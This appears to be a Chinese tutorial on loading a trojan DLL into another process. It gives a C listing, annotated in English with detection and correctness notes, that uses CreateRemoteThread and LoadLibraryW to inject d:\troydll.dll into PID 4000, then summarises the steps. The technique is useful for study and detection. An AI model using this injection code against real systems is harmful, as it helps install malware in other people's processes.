将d盘根目录下的troydll.dll插入到ID为4000的进程中

//将d盘根目录下的troydll.dll插入到ID为4000的进程中:
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
/* File-scope state shared with main() below.  Of these, only hRemoteThread,
 * hRemoteProcess, dwRemoteProcessId and pszLibFileRemote are referenced in
 * this listing; pdwThreadId, fdwCreate and dwStackSize are declared but
 * never used. */
PDWORD pdwThreadId;
HANDLE hRemoteThread, hRemoteProcess;          /* remote thread handle / target process handle */
DWORD fdwCreate, dwStackSize, dwRemoteProcessId; /* dwRemoteProcessId: target PID, assigned in main() */
PWSTR pszLibFileRemote=NULL;                   /* address of the DLL path string inside the target process */

/*
 * Textbook CreateRemoteThread + LoadLibraryW injection: the DLL path is
 * written into the target's address space and a remote thread is started
 * whose entry point is kernel32!LoadLibraryW, so the target loads the DLL
 * itself.  Target PID and DLL path are hard-coded below.
 *
 * Defender's note: the cross-process call sequence visible here —
 * OpenProcess with PROCESS_VM_WRITE|PROCESS_CREATE_THREAD on a foreign PID,
 * VirtualAllocEx, WriteProcessMemory, then CreateRemoteThread whose start
 * address resolves to LoadLibraryW — is the classic telemetry signature of
 * this technique (Sysmon Event ID 8 records CreateRemoteThread together
 * with the resolved start function).  Whether OpenProcess succeeds depends
 * on the caller's rights over the target; nothing in this listing checks it.
 *
 * Correctness notes: `void main` is non-standard (the C standard requires
 * `int main`), argc/argv are unused, and none of the Win32 return values
 * are tested before the next call uses them.  The listing as posted also
 * has a stray `}` after this function's closing brace, so it does not
 * compile as-is.
 */
void main(int argc,char **argv)
{
 int iReturnCode;
 char lpDllFullPathName[MAX_PATH];
 WCHAR pszLibFileName[MAX_PATH]={0};   /* zero-initialised: the conversion below relies on this for NUL termination */
 dwRemoteProcessId = 4000;             /* hard-coded target PID */
 strcpy(lpDllFullPathName, "d:\\troydll.dll");   /* hard-coded DLL path; fits MAX_PATH, so strcpy is bounded here */
 /* Convert the ANSI path to UTF-16.  cbMultiByte is strlen() without the
  * terminator, so the terminating L'\0' comes only from the ={0} above;
  * iReturnCode (0 on failure) is never checked. */
 iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
  lpDllFullPathName, strlen(lpDllFullPathName),pszLibFileName, MAX_PATH);  /* ANSI -> UNICODE conversion of the full DLL path */
 /* Open the target ("remote") process with exactly the rights the
  * technique needs.  A NULL result is not checked; the handle is passed
  * straight into the calls below. */
hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | /* allow creating a thread in the target */
  PROCESS_VM_OPERATION | /* allow VirtualAllocEx/VirtualFreeEx in the target */
  PROCESS_VM_WRITE, /* allow WriteProcessMemory into the target */
  FALSE, dwRemoteProcessId );
 
 int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR); /* bytes needed for the wide path including its terminator */
 /* Reserve a read/write buffer for the path inside the target; NULL on failure is not checked. */
 pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);

 /* Copy the DLL path (pszLibFileName = "d:\\troydll.dll") into the target's buffer.
  * The BOOL result is stored in iReturnCode but never tested. */
 iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);

 /* Resolve LoadLibraryW in *this* process and reuse the address in the
  * target.  That only works if kernel32 is mapped at the same base in both
  * processes (same bitness; kernel32's base is shared across processes in
  * practice) — NOTE(review): assumption, not checked by the code. */
 PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
   GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");

 /* Start a thread in the target at LoadLibraryW with the remote path buffer
  * as its single argument, so the target itself loads the DLL. */
 hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);

 /* Wait for LoadLibraryW to return in the target. */
 WaitForSingleObject(hRemoteThread, INFINITE);
 /* Cleanup.  These NULL checks come after every handle has already been
  * used above, so they cannot prevent a failed OpenProcess/CreateRemoteThread
  * from propagating; they only avoid freeing/closing a NULL at the end. */
 if (pszLibFileRemote != NULL)
 {
  VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
 }
 if (hRemoteThread != NULL)
 {
  CloseHandle(hRemoteThread );
 }
 if (hRemoteProcess!= NULL)
 {
  CloseHandle(hRemoteProcess);
 }
}

}

  从DLL木马注入程序的源代码中我们可以分析出DLL木马注入的一般步骤为:

  (1)取得宿主进程(即要注入木马的进程)的进程ID dwRemoteProcessId;

  (2)取得DLL的完全路径,并将其转换为宽字符模式pszLibFileName;

  (3)利用Windows API OpenProcess打开宿主进程,应该开启下列选项:

  a.PROCESS_CREATE_THREAD:允许在宿主进程中创建线程;

  b.PROCESS_VM_OPERATION:允许对宿主进程中进行VM操作;

  c.PROCESS_VM_WRITE:允许对宿主进程进行VM写。

  (4)利用Windows API VirtualAllocEx函数在远程进程的VM中分配DLL完整路径宽字符所需的存储空间,并利用Windows API WriteProcessMemory函数将完整路径写入该存储空间;

  (5)利用Windows API GetProcAddress取得Kernel32模块中LoadLibraryW函数的地址,这个函数将作为随后将启动的远程线程的入口函数;

  (6)利用Windows API CreateRemoteThread启动远程线程,将LoadLibraryW的地址作为远程线程的入口函数地址,将宿主进程里被分配空间中存储的完整DLL路径作为线程入口函数的参数以令其启动指定的DLL;

  (7)清理现场。
